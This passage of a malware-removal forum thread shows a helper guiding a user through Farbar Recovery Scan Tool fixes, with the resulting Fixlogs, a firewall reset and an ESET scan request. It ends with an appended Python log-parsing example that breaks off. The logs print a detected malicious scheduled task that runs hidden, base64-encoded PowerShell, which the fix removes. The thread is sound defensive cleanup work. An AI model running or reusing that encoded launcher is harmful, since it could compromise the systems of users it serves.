S3 equ8_helper; \??\C:\WINDOWS\system32\DRIVERS\equ8_helper.sys [X]
S3 wtbt; \??\c:\program files (x86)\steam\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Medal] => C:\Users\Miggy\AppData\Local\Medal\update.exe [1901144 2022-01-09] (Ferox Games B.V. -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Energy] => C:\Users\Miggy\AppData\Roaming\Energy\Energy.exe --fTZuKpU (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [NZXT.CAM] => C:\Program Files\NZXT CAM\NZXT CAM.exe --startup (No File)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-10-17]
ShortcutTarget: IMVU.lnk -> C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (No File)
Task: {2C3DB3C3-1853-4F46-9049-ADE90B75A3FA} - System32\Tasks\chrome tab => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAKACQAZQBuAGMAUwB0AHIAQQBzAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAVgBhAGwAdQBlAE4AZQB3ACgAWwBzAHQAcgBpAG (the data entry has 4955 more characters). <==== ATTENTION
cmd: nets advfirewall reset
cmd: type C:\Users\Miggy\AppData\Roaming\asof
End::

 

===============================================

In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach them.

  • How is your system running?
  • Have you configured policies for Windows Update?
  • Problems removing RestMinder?
  • Content of fixlog.txt


Kind regards,
Axe0

#7 miggybruh

Posted 17 July 2022 - 08:11 PM

Hello, my system is running great, nothing wrong with it as far as I can see. I have not configured policies for Windows Update. I had no problem removing RestMinder. Here is the content of fixlog.txt:

Fix result of Farbar Recovery Scan Tool (x64) Version: 14-07-2022
Ran by Miggy (17-07-2022 17:51:00) Run:1
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start::
CreateRestorePoint:
CloseProcesses:
emptytemp:
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [3442]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
C:\ProgramData\DisplaySessionContainer*.log
C:\ProgramData\DisplaySessionContainer*.log_backup1
C:\Users\Miggy\AppData\Local\Programs\RestMinder
2022-07-15 22:20 - 2022-07-15 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\chrome_tab
2022-07-11 15:32 - 2022-07-11 15:32 - 000013970 _____ C:\WINDOWS\system32\Tasks\chrome tab
C:\users\miggy\appdata\roaming\energy
C:\users\miggy\appdata\roaming\bloom
2021-10-13 22:03 - 2021-10-13 22:03 - 000006889 _____ () C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp
Folder: C:\Users\Miggy\AppData\Local\Enverr
Folder: C:\Users\Miggy\AppData\LocalLow\Rayll
Task: {35A6F66D-DC69-4521-8F02-D46FEAA910DC} - System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => C:\Program Files\CUAssistant\culauncher.exe (No File)
S3 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
S3 equ8_helper; \??\C:\WINDOWS\system32\DRIVERS\equ8_helper.sys [X]
S3 wtbt; \??\c:\program files (x86)\steam\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Medal] => C:\Users\Miggy\AppData\Local\Medal\update.exe [1901144 2022-01-09] (Ferox Games B.V. -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Energy] => C:\Users\Miggy\AppData\Roaming\Energy\Energy.exe --fTZuKpU (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [NZXT.CAM] => C:\Program Files\NZXT CAM\NZXT CAM.exe --startup (No File)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-10-17]
ShortcutTarget: IMVU.lnk -> C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (No File)
Task: {2C3DB3C3-1853-4F46-9049-ADE90B75A3FA} - System32\Tasks\chrome tab => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAKACQAZQBuAGMAUwB0AHIAQQBzAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAVgBhAGwAdQBlAE4AZQB3ACgAWwBzAHQAcgBpAG (the data entry has 4955 more characters). <==== ATTENTION
cmd: nets advfirewall reset
cmd: type C:\Users\Miggy\AppData\Roaming\asof
End::
*****************

Restore point was successfully created.
Processes closed successfully.
C:\WINDOWS\tracing => ":?" ADS removed successfully
C:\ProgramData\DisplaySessionContainer1.log => ":F107EE40EF" ADS removed successfully
C:\ProgramData\DisplaySessionContainer1.log_backup1 => ":2DD1EC5C91" ADS removed successfully
C:\ProgramData\DisplaySessionContainer10.log => ":CCC93B07B0" ADS removed successfully
C:\ProgramData\DisplaySessionContainer10.log_backup1 => ":AD433BF298" ADS removed successfully
C:\ProgramData\DisplaySessionContainer11.log => ":72C8986B20" ADS removed successfully
C:\ProgramData\DisplaySessionContainer11.log_backup1 => ":97A90964FA" ADS removed successfully
C:\ProgramData\DisplaySessionContainer12.log => ":C40F6B9209" ADS removed successfully
C:\ProgramData\DisplaySessionContainer12.log_backup1 => ":7CC29836A6" ADS removed successfully
C:\ProgramData\DisplaySessionContainer13.log => ":AE3C879266" ADS removed successfully
C:\ProgramData\DisplaySessionContainer13.log_backup1 => ":AF8AA3CDC1" ADS removed successfully
C:\ProgramData\DisplaySessionContainer14.log => ":DE1448F4D7" ADS removed successfully
C:\ProgramData\DisplaySessionContainer14.log_backup1 => ":D61270D3FD" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini => ":B1DA6C571C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk => ":7661CCE9BF" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk => ":0BBB729577" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk => ":638138415C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk => ":C56174E6CE" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini => ":41964AA945" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk => ":BE32D07BC5" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk => ":980850BA8A" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => ":8096E45125" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk => ":578370639A" ADS removed successfully
C:\Users\Miggy\Application Data => ":00e481b5e22dbe1f649fcddd505d3eb7" ADS removed successfully
"C:\Users\Miggy\AppData\Roaming" => ":00e481b5e22dbe1f649fcddd505d3eb7" ADS not found.

=========== "C:\ProgramData\DisplaySessionContainer*.log" ==========

C:\ProgramData\DisplaySessionContainer1.log => moved successfully
C:\ProgramData\DisplaySessionContainer10.log => moved successfully
C:\ProgramData\DisplaySessionContainer11.log => moved successfully
C:\ProgramData\DisplaySessionContainer12.log => moved successfully
C:\ProgramData\DisplaySessionContainer13.log => moved successfully
C:\ProgramData\DisplaySessionContainer14.log => moved successfully
C:\ProgramData\DisplaySessionContainer15.log => moved successfully
C:\ProgramData\DisplaySessionContainer16.log => moved successfully
C:\ProgramData\DisplaySessionContainer17.log => moved successfully
C:\ProgramData\DisplaySessionContainer18.log => moved successfully
C:\ProgramData\DisplaySessionContainer19.log => moved successfully
C:\ProgramData\DisplaySessionContainer2.log => moved successfully
C:\ProgramData\DisplaySessionContainer20.log => moved successfully
C:\ProgramData\DisplaySessionContainer21.log => moved successfully
C:\ProgramData\DisplaySessionContainer22.log => moved successfully
C:\ProgramData\DisplaySessionContainer23.log => moved successfully
C:\ProgramData\DisplaySessionContainer24.log => moved successfully
C:\ProgramData\DisplaySessionContainer25.log => moved successfully
C:\ProgramData\DisplaySessionContainer26.log => moved successfully
C:\ProgramData\DisplaySessionContainer27.log => moved successfully
C:\ProgramData\DisplaySessionContainer28.log => moved successfully
C:\ProgramData\DisplaySessionContainer29.log => moved successfully
C:\ProgramData\DisplaySessionContainer3.log => moved successfully
C:\ProgramData\DisplaySessionContainer4.log => moved successfully
C:\ProgramData\DisplaySessionContainer5.log => moved successfully
C:\ProgramData\DisplaySessionContainer6.log => moved successfully
C:\ProgramData\DisplaySessionContainer7.log => moved successfully
C:\ProgramData\DisplaySessionContainer8.log => moved successfully
C:\ProgramData\DisplaySessionContainer9.log => moved successfully

========= End -> "C:\ProgramData\DisplaySessionContainer*.log" ========

=========== "C:\ProgramData\DisplaySessionContainer*.log_backup1" ==========

C:\ProgramData\DisplaySessionContainer1.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer10.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer11.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer12.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer13.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer14.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer15.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer16.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer17.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer18.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer19.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer2.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer20.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer21.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer22.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer23.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer24.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer25.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer3.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer4.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer5.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer6.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer7.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer8.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer9.log_backup1 => moved successfully

========= End -> "C:\ProgramData\DisplaySessionContainer*.log_backup1" ========

C:\Users\Miggy\AppData\Local\Programs\RestMinder => moved successfully
C:\Users\Miggy\AppData\Local\chrome_tab => moved successfully
C:\WINDOWS\system32\Tasks\chrome tab => moved successfully
"C:\users\miggy\appdata\roaming\energy" => not found
"C:\users\miggy\appdata\roaming\bloom" => not found
C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp => moved successfully

========================= Folder: C:\Users\Miggy\AppData\Local\Enverr ========================

2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Config
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\CrashReportClient
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\CrashReportClient\UE4CC-Windows-40C24D264EA78888025A9BAB581B8207
2022-07-14 14:26 - 2022-07-14 14:26 - 000000112 ____A [13F8815C6C6582CD5630BAC6DF8D1E7C] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\CrashReportClient\UE4CC-Windows-40C24D264EA78888025A9BAB581B8207\CrashReportClient.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Compat.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\DeviceProfiles.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\EditorScriptingUtilities.ini
2022-07-14 14:26 - 2022-07-14 14:33 - 000001488 ____A [F6B8A0250E503EA641C4081292050C6C] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Engine.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Game.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\GameplayTags.ini
2022-07-14 14:26 - 2022-07-14 14:33 - 000001096 ____A [480933AB06629BE96E05C23906DBFB30] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\GameUserSettings.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Hardware.ini
2022-07-14 14:26 - 2022-07-14 14:28 - 000000172 ____A [889CF1C393EA3ABB4B8C9A14F9C83DA9] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Input.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\MagicLeap.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\MagicLeapLightEstimation.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Niagara.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\OculusVR.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Paper2D.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\PhysXVehicles.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\RuntimeOptions.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Scalability.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Synthesis.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\VariantManagerContent.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Logs

====== End of Folder: ======

========================= Folder: C:\Users\Miggy\AppData\LocalLow\Rayll ========================

2022-01-22 00:32 - 2022-01-22 22:52 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom
2022-01-22 00:32 - 2022-01-22 22:52 - 000000733 ____A [083A8801812C55BD3E8B3D2740D14382] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\output_log.txt
2022-01-22 00:50 - 2022-01-22 01:08 - 000001469 ____A [A3ACBABD7EFDC9F3C4D2399EEBAE82CA] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\SaveFile.es3
2022-01-22 00:50 - 2022-01-22 01:08 - 000001470 ____A [783FA2DB6A3F01C9568841F3DB766C45] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\SaveFile.es3.tmp.bak
2022-07-11 22:21 - 2022-07-11 22:29 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom - Norwood Hitchhike
2022-07-11 22:21 - 2022-07-11 23:20 - 000007190 ____A [56B4D0057AF27A7BAFF90E3F6492C7D1] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom - Norwood Hitchhike\Player.log
2022-07-11 22:21 - 2022-07-11 22:29 - 000001567 ____A [9FBD561A096542CA21DD49FC31ECF12B] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom - Norwood Hitchhike\Player-prev.log
2022-01-22 00:33 - 2022-01-22 00:33 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity
2022-01-22 00:33 - 2022-01-22 00:33 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393
2022-01-22 00:33 - 2022-01-22 00:33 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393\Analytics
2022-01-22 00:33 - 2022-01-22 22:52 - 000000304 ____A [E4BE01C27E0FD275D87412CDA20AD316] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393\Analytics\config
2022-01-22 00:33 - 2022-01-22 22:54 - 000000131 ____A [6BF803170A2A16846D7B9719971CA977] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393\Analytics\values
2022-01-22 00:33 - 2022-01-22 22:54 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393\Analytics\ArchivedEvents

====== End of Folder: ======

"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{35A6F66D-DC69-4521-8F02-D46FEAA910DC}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{35A6F66D-DC69-4521-8F02-D46FEAA910DC}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\CUAssistant\CULauncher" => removed successfully
HKLM\System\CurrentControlSet\Services\cpuz150 => removed successfully
cpuz150 => service removed successfully
HKLM\System\CurrentControlSet\Services\equ8_helper => removed successfully
equ8_helper => service removed successfully
HKLM\System\CurrentControlSet\Services\wtbt => removed successfully
wtbt => service removed successfully
"HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Software\Microsoft\Windows\CurrentVersion\Run\\Medal" => removed successfully
"HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Software\Microsoft\Windows\CurrentVersion\Run\\Energy" => removed successfully
"HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Software\Microsoft\Windows\CurrentVersion\Run\\NZXT.CAM" => removed successfully
C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk => moved successfully
"C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C3DB3C3-1853-4F46-9049-ADE90B75A3FA}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C3DB3C3-1853-4F46-9049-ADE90B75A3FA}" => removed successfully
"C:\WINDOWS\System32\Tasks\chrome tab" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\chrome tab" => removed successfully

========= nets advfirewall
reset ========= 'nets' is not recognized as an internal or external command, operable program or batch file. ========= End of CMD: ========= ========= type C:\Users\Miggy\AppData\Roaming\asof ========= x £ ========= End of CMD: ========= =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 304738127 B Java, Discord, Steam htmlcache => 1220101557 B Windows/system/drivers => 36588728 B Edge => 284857 B Chrome => 421104190 B Firefox => 568659373 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B ProgramData => 0 B Public => 0 B systemprofile => 0 B systemprofile32 => 0 B LocalService => 7268 B NetworkService => 6541376 B Miggy => 2688878477 B RecycleBin => 6705440 B EmptyTemp: => 4.9 GB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 18:02:48 ====

#8 axe0

Posted 18 July 2022 - 12:17 PM

Please do the following.

Run FRST Fix
Warning: This script was created for this specific system. Attempting to use the fix on another system may cause damage to the system.

  • Right-click FRST64.exe then click "Run as administrator".
  • Select the entire content of the code below including "Start::" and "End::", right click and select "Copy"
  • Click Fix button once and wait
  • When finished, it will produce a log called Fixlog.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Start::
CreateRestorePoint:
CloseProcesses:
C:\Users\Miggy\AppData\Roaming\asof
cmd: netsh advfirewall reset
exportkey:  HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
End::

 

===============================================

In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach them.

  • Content of fixlog.txt


Kind regards,
Axe0

#9 miggybruh

Posted 19 July 2022 - 06:50 PM

Here is the content of fixlog.txt

Fix result of Farbar Recovery Scan Tool (x64) Version: 18-07-2022
Ran by Miggy (19-07-2022 16:46:41) Run:2
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start::
CreateRestorePoint:
CloseProcesses:
C:\Users\Miggy\AppData\Roaming\asof
cmd: netsh advfirewall reset
exportkey:  HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
End::
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Users\Miggy\AppData\Roaming\asof => moved successfully
 
========= netsh advfirewall reset =========
 
Ok.
 
 
========= End of CMD: =========
 
================== ExportKey: ===================
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoRebootWithLoggedOnUsers"="0"
 
=== End of ExportKey ===
 
 
The system needed a reboot.
 
==== End of Fixlog 16:46:55 ====


#10 axe0

Posted 20 July 2022 - 12:20 PM

The logs look good so far. The Windows Update portion is a new detection in FRST; by design, FRST detects the presence of it, as it may or may not have something malicious there. In your situation it is just the presence and nothing malicious there.

Please do the following next; this scanner is very thorough. After ESET is finished, please run a new scan with FRST.

ESET Online Scanner
Please download ESET Online Scanner and save it to your desktop.

  • Right-click on esetonlinescanner_enu.exe and select Run as Administrator.
  • When the tool opens, click Get Started.
  • Read and accept the license agreement.
  • At the Welcome to ESET Online Scanner window, click Get Started.
  • Select whether you would like to send anonymous data to ESET.
  • Note: if you see the "Welcome Back to ESET Online Scanner" screen, click Computer Scan > Full Scan.
  • Click on the Full Scan option.
  • Select Enable ESET to detect and remove potentially unwanted applications, then click Start scan.
  • ESET will now begin scanning your computer. This may take some time.
  • When the scan is finished and if threats have been detected, select Save scan log. Save it to your desktop as eset.txt. Click on Continue.
  • ESET Online Scanner may ask if you'd like to turn on the Periodic Scan feature. Click on Continue.
  • On the next screen, you can leave feedback about the program if you wish. Check the box for Delete application data on closing. If you left feedback, click Submit and continue. If not, Close without feedback.
  • Open the scan log on your desktop (eset.txt) and copy and paste its contents into your next reply.

 

===============================================

In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach them.

  • Content of eset.txt
  • Content of FRST.txt
  • Content of Addition.txt


Kind regards,
Axe0
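
The Fixlog checks made by eye in the posts above can also be scripted. The following is an added example, not part of the original posts and not FRST's own logic: it parses Fixlog text and flags items FRST could not find, commands that Windows rejected (the nets line in the first Fixlog), and values exported from the WindowsUpdate policy key. The sample log is constructed from the two Fixlogs in this thread, and REVIEW_VALUES is a list chosen for this example.

```python
import re

# Constructed sample, condensed from the two Fixlogs quoted in this thread.
SAMPLE_FIXLOG = r'''
"C:\WINDOWS\System32\Tasks\chrome tab" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\chrome tab" => removed successfully

========= nets advfirewall reset =========

'nets' is not recognized as an internal or external command,
operable program or batch file.

========= End of CMD: =========

C:\Users\Miggy\AppData\Roaming\asof => moved successfully

========= netsh advfirewall reset =========

Ok.

========= End of CMD: =========

================== ExportKey: ===================

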